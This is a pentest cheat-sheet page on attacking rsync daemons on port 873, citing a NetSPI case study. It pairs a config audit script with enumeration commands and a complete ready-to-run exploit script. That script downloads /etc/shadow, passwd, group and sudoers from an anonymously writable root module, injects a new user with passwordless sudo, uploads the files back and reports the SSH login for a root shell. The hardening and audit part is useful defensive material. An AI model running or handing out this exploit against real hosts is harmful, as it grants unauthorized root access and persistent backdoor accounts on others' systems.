873 - RSYNC
Rsync is a utility for transferring and synchronizing files between hosts (usually Linux). Run as a daemon it listens on TCP 873 and exports directories as "modules" defined in rsyncd.conf. The daemon frequently runs as root, so a module with no auth users, no hosts allow and read only = false hands out write access to whatever path it exports.
Example of an rsyncd.conf file that allows anonymous root access to the entire file system:
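The weak configuration just described next to a hardened one, with a small audit function that flags the dangerous settings. This is an added example, not the page's own config: the module names, paths, host and secrets file are constructed for illustration, and the audit only inspects rsyncd.conf text (global settings are inherited by every module unless the module overrides them, which is how rsync itself reads the file).

```shell
#!/bin/sh
# Added example (not from the original page): a weak rsyncd.conf beside a
# hardened one, plus an audit function that flags the risky settings.
# Module names, paths, hosts and the secrets file are constructed placeholders.

# Weak: one module exports the whole filesystem, writable, as root, to anyone.
WEAK_CONF='uid = root
gid = root
use chroot = no
max connections = 4
pid file = /var/run/rsyncd.pid

[files]
    path = /
    comment = All files on the system
    read only = false
    list = yes
'

# Hardened: unprivileged uid, read-only, chrooted, one allowed host, and a
# password (the secrets file is assumed to exist, mode 0600, owned by root).
HARDENED_CONF='uid = nobody
gid = nogroup
use chroot = yes
max connections = 4
pid file = /var/run/rsyncd.pid

[backup]
    path = /srv/backup
    comment = Backup staging area
    read only = true
    list = no
    hosts allow = 10.0.0.5
    auth users = backup
    secrets file = /etc/rsyncd.secrets
'

# audit_rsyncd_conf: reads an rsyncd.conf on stdin and prints one line per
# module, "<module> <risk,risk,...>" or "<module> ok". Only explicitly weak
# values are flagged; rsync's defaults (read only, chroot, uid nobody) are safe.
audit_rsyncd_conf() {
    awk '
    function norm(s) { gsub(/^[ \t]+|[ \t]+$/, "", s); return tolower(s) }
    function report(m,   r) {
        r = ""
        if (cfg[m, "uid"] == "root" || cfg[m, "uid"] == "0")                 r = r "runs-as-root,"
        if (cfg[m, "read only"] == "false" || cfg[m, "read only"] == "no")    r = r "writable,"
        if (cfg[m, "path"] == "/")                                            r = r "exports-rootfs,"
        if (cfg[m, "auth users"] == "")                                       r = r "anonymous,"
        if (cfg[m, "hosts allow"] == "")                                      r = r "any-host,"
        if (cfg[m, "use chroot"] == "no" || cfg[m, "use chroot"] == "false")  r = r "no-chroot,"
        sub(/,$/, "", r)
        print m " " (r == "" ? "ok" : r)
    }
    BEGIN { mod = "" }
    /^[ \t]*#/ || /^[ \t]*;/ || /^[ \t]*$/ { next }      # comments and blank lines
    /^[ \t]*\[.*\][ \t]*$/ {                              # [module] header
        if (mod != "") report(mod)
        mod = $0; sub(/^[ \t]*\[/, "", mod); sub(/\][ \t]*$/, "", mod)
        for (k in glob) cfg[mod, k] = glob[k]             # modules inherit globals
        next
    }
    /=/ {                                                 # key = value
        k = norm(substr($0, 1, index($0, "=") - 1))
        v = norm(substr($0, index($0, "=") + 1))
        if (mod == "") glob[k] = v; else cfg[mod, k] = v
    }
    END { if (mod != "") report(mod) }
    '
}
```

Running `printf '%s' "$WEAK_CONF" | audit_rsyncd_conf` prints `files runs-as-root,writable,exports-rootfs,anonymous,any-host,no-chroot`, while the hardened file yields `backup ok`; pointing it at a real /etc/rsyncd.conf is a quick check during a host review.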
Enumeration
nmap -p 873 192.168.0.1
nmap's rsync-list-modules NSE script pulls the daemon's module list in the same pass; the rsync client itself does the rest of the enumeration below.
List directory
List directory (IPv6)
List sub directory contents
List directories and files recursively
Download files
Download folders
Upload files
Upload folders
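The rsync daemon commands behind each of the headings above, collected into one script. This is an added example, not code from the original page: TARGET, TARGET6 and the module/path arguments are constructed placeholders, the `rsync://host/module` URL form is interchangeable with `host::module`, and the module-listing format that parse_modules relies on (name, padding, a tab, then the comment) is stated as an assumption.

```shell
#!/bin/sh
# Added example (not from the original page): the rsync daemon commands behind
# the enumeration and transfer headings, wrapped as shell functions, plus a
# parser for the module listing. TARGET/TARGET6 and every module or path
# argument are constructed placeholders.
TARGET="${TARGET:-192.168.0.1}"
TARGET6="${TARGET6:-2001:db8::1}"   # documentation prefix, constructed

# List the modules the daemon exports (name and comment).
list_modules()    { rsync "rsync://$TARGET/"; }
# Same over IPv6: the address must be bracketed in the URL form.
list_modules_v6() { rsync "rsync://[$TARGET6]/"; }
# List one directory level of a module, or of a sub directory inside it.
list_dir()        { rsync --list-only "rsync://$TARGET/$1/"; }      # $1 = module[/sub/dir]
# Walk the whole tree below a path (-r recurses; -a would imply it as well).
list_recursive()  { rsync -r --list-only "rsync://$TARGET/$1/"; }
# Download a single file or a whole directory into a local destination.
download()        { rsync -av "rsync://$TARGET/$1" "$2"; }          # $1 = module/path, $2 = local dest
# Upload a local file or directory; fails unless the module is writable.
upload()          { rsync -av "$1" "rsync://$TARGET/$2"; }          # $1 = local path, $2 = module/path

# probe_writable MODULE: dry-run upload of an empty file. Assumption: the daemon
# rejects a push to a read-only module up front ("@ERROR: module is read only"),
# so this separates writable from read-only modules without changing anything
# on the target. Any other failure (auth required, no such module) is also
# reported as not-writable.
probe_writable() {
    tmp=$(mktemp)
    if rsync -q --dry-run "$tmp" "rsync://$TARGET/$1/" 2>/dev/null; then
        echo writable
    else
        echo not-writable
    fi
    rm -f "$tmp"
}

# parse_modules: module names from a listing on stdin. Assumption: rsync prints
# each module as "name<padding><TAB>comment"; a message-of-the-day line, if
# the daemon has one, carries no tab and is skipped.
parse_modules() {
    awk -F'\t' 'NF >= 2 { n = $1; sub(/[ \t]+$/, "", n); if (n != "") print n }'
}

# Constructed sample of what list_modules prints (including a MOTD line).
SAMPLE_LISTING=$(printf 'Welcome to the backup server\n\nfiles          \tAll files on the system\nwww            \tWeb root\n')

# enumerate: every module, whether it is writable, and its top-level listing.
enumerate() {
    list_modules | parse_modules | while read -r m; do
        echo "== $m ($(probe_writable "$m"))"
        list_dir "$m"
    done
}
```

`printf '%s\n' "$SAMPLE_LISTING" | parse_modules` prints `files` and `www` offline; `enumerate` needs a live target and is the first thing worth running once port 873 answers, because a writable module that exports `/` is what the rest of this page depends on.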
Creating a New User through Rsync
If rsync is configured to run as root and a module that exports / is anonymously writable, it's possible to create a new privileged Linux user by modifying the shadow, passwd, group, and sudoers files directly.
Note: The same general approach can be used for any vulnerability that provides full write access to the OS. A few other examples include NFS exports and uploading web shells running as root.
Creating the Home Directory
Let's start by creating our new user's home directory.
Create the Shadow File Entry
The /etc/shadow file holds each account's password hash and password-aging fields (home directories and shells live in /etc/passwd, not here). It is only readable by root (and by the shadow group on some distributions).
To inject a new user entry via rsync you'll have to:
Generate a password.
Create the line to inject.
Download /etc/shadow (and keep a backup copy so you can restore it later).
Append the new user to the end of /etc/shadow
Upload / Overwrite the existing /etc/shadow, keeping its restrictive permissions (it must not become world-readable).
Note: Make sure to create a new user that doesn't already exist on the system.
Create the password hash (a crypt-format hash such as SHA-512, starting with $6$, is what /etc/shadow expects; a plain-text password in that field will never match):
Add New User Entry to /etc/shadow:
Create Passwd File Entry
The /etc/passwd file keeps track of the accounts registered on the system (name, UID, GID, home directory, login shell). It does not contain password hashes; the x in the second field means the hash lives in /etc/shadow. It can be read by all users.
To inject a new user entry via rsync you'll have to:
Create the user entry to inject.
Download /etc/passwd. (and back it up so you can restore state later)
Append the new user entry to the end of passwd.
Upload / Overwrite the existing /etc/passwd (it must stay world-readable, otherwise user and group name lookups break for everyone).
Note: Feel free to change the UID, but make sure it matches the GID set in the /etc/group entry and does not collide with an existing account. In this case both UID and GID are 1021.
Add New User Entry to /etc/passwd:
Create the Group File Entry
The /etc/group file keeps track of the groups registered on the system (name, GID, members). It does not contain password hashes. It can be read by all users.
To inject a new group entry via rsync you'll have to:
Create the user entry to inject.
Download /etc/group. (and backup, just in case)
Append the new user entry to the end of group.
Upload / Overwrite the existing /etc/group file.
Note: Feel free to change the GID, but make sure it matches the value set in the /etc/passwd entry. In this case both UID and GID are 1021.
Add New User Entry to /etc/group:
Create Sudoers File Entry
The /etc/sudoers file lists the users allowed to run commands as root through the sudo command. It can only be read by root. We are going to modify it to allow the new user to execute any command through sudo.
Two caveats: a syntax error in sudoers disables sudo for every user on the box, so check the edited copy with visudo -c -f before uploading it; and sudo refuses to run if the file is not owned by root with mode 0440, so upload it with its permissions preserved and without carrying over the owner of your local copy (rsync -p rather than -a when you are not root locally). If the target's sudoers has an #includedir /etc/sudoers.d line, dropping a separate file into that directory is less fragile than editing the main file.
To inject an entry via rsync you'll have to:
Create the user entry to inject.
Download /etc/sudoers. (and backup, just in case)
Append the new user entry to the end of sudoers.
Upload / Overwrite the existing /etc/sudoers file.
Add New User Entry to /etc/sudoers:
Now you can simply log in to the server via SSH with the newly created user (this assumes sshd accepts password authentication) and run sudo sh to get a root shell.
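The whole procedure above (home directory, shadow, passwd, group and sudoers entries, download, append, upload) as one script. This is an added example, not code from the original page or from the NetSPI post it cites: the module name `files` (assumed to export /), the user `pwned`, the UID/GID 1021 and the password are constructed placeholders, and inject_into works on local copies so the entry-building and collision checks can be exercised without a target.

```shell
#!/bin/sh
# Added example, not from the original page: builds the four entries described
# above, appends them to local copies of shadow/passwd/group/sudoers and pushes
# them back over rsync. MODULE "files" is assumed to export /; NEWUSER, NEWID
# and PASSWORD are constructed placeholders (override them in the environment).
TARGET="${TARGET:-192.168.0.1}"
MODULE="${MODULE:-files}"
NEWUSER="${NEWUSER:-pwned}"
NEWID="${NEWID:-1021}"
PASSWORD="${PASSWORD:-changeme}"

# gen_hash PASSWORD: SHA-512 crypt hash ($6$salt$...) with a random salt, the
# format /etc/shadow expects. Needs openssl on the attacking box.
gen_hash() { openssl passwd -6 "$1"; }

# The four lines to inject. shadow field 3 is the last-change date in days
# since the epoch; 0:99999:7 are the usual min/max/warn aging values.
shadow_entry()  { printf '%s:%s:%s:0:99999:7:::\n' "$1" "$2" "$(( $(date +%s) / 86400 ))"; }
passwd_entry()  { printf '%s:x:%s:%s:%s:/home/%s:/bin/bash\n' "$1" "$2" "$2" "$1" "$1"; }
group_entry()   { printf '%s:x:%s:\n' "$1" "$2"; }
sudoers_entry() { printf '%s ALL=(ALL) NOPASSWD:ALL\n' "$1"; }

# inject_into DIR USER HASH ID: append the entries to DIR/{shadow,passwd,group,
# sudoers}, keeping a .bak of each, and refuse if the user name or the UID/GID
# is already taken (the collisions the notes above warn about).
inject_into() {
    dir=$1; user=$2; hash=$3; uid=$4
    if grep -q "^$user:" "$dir/passwd" "$dir/shadow" "$dir/group"; then
        echo "user $user already exists" >&2; return 1
    fi
    if grep -q "^[^:]*:x:$uid:" "$dir/passwd" "$dir/group"; then
        echo "uid/gid $uid already in use" >&2; return 1
    fi
    for f in shadow passwd group sudoers; do cp -p "$dir/$f" "$dir/$f.bak"; done
    shadow_entry  "$user" "$hash" >> "$dir/shadow"
    passwd_entry  "$user" "$uid"  >> "$dir/passwd"
    group_entry   "$user" "$uid"  >> "$dir/group"
    sudoers_entry "$user"         >> "$dir/sudoers"
}

# check_sudoers FILE: a syntax error in sudoers disables sudo for everyone, so
# validate the edited copy before uploading it (needs visudo locally).
check_sudoers() { visudo -c -q -f "$1"; }

# exploit: download, inject, upload. Not run automatically (it talks to TARGET).
# Uploads use -p (permissions only) rather than -a: the files keep their modes
# but are written by the daemon as root, so they are not left owned by the
# local user's uid, which would make sudo reject sudoers.
exploit() {
    work=$(mktemp -d)
    for f in shadow passwd group sudoers; do
        rsync -p "rsync://$TARGET/$MODULE/etc/$f" "$work/$f" || return 1
        stat -c %a "$work/$f" > "$work/$f.mode"   # remember the original mode
        chmod u+rw "$work/$f"                      # shadow/sudoers arrive unwritable
    done
    inject_into "$work" "$NEWUSER" "$(gen_hash "$PASSWORD")" "$NEWID" || return 1
    for f in shadow passwd group sudoers; do
        chmod "$(cat "$work/$f.mode")" "$work/$f"  # put the restrictive mode back
    done
    if command -v visudo >/dev/null 2>&1; then check_sudoers "$work/sudoers" || return 1; fi
    mkdir -p "$work/home/$NEWUSER"                 # home directory (root-owned on the target)
    rsync -rp "$work/home/" "rsync://$TARGET/$MODULE/home/" || return 1
    for f in shadow passwd group sudoers; do
        rsync -p "$work/$f" "rsync://$TARGET/$MODULE/etc/$f" || return 1
    done
    echo "done: ssh $NEWUSER@$TARGET (password: $PASSWORD), then sudo sh"
}
```

Restoring state afterwards is the .bak files uploaded back in the same way; the home directory ends up root-owned because the daemon writes it, which does not stop the login or the sudo step.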
source:
https://blog.netspi.com/linux-hacking-case-studies-part-1-rsync/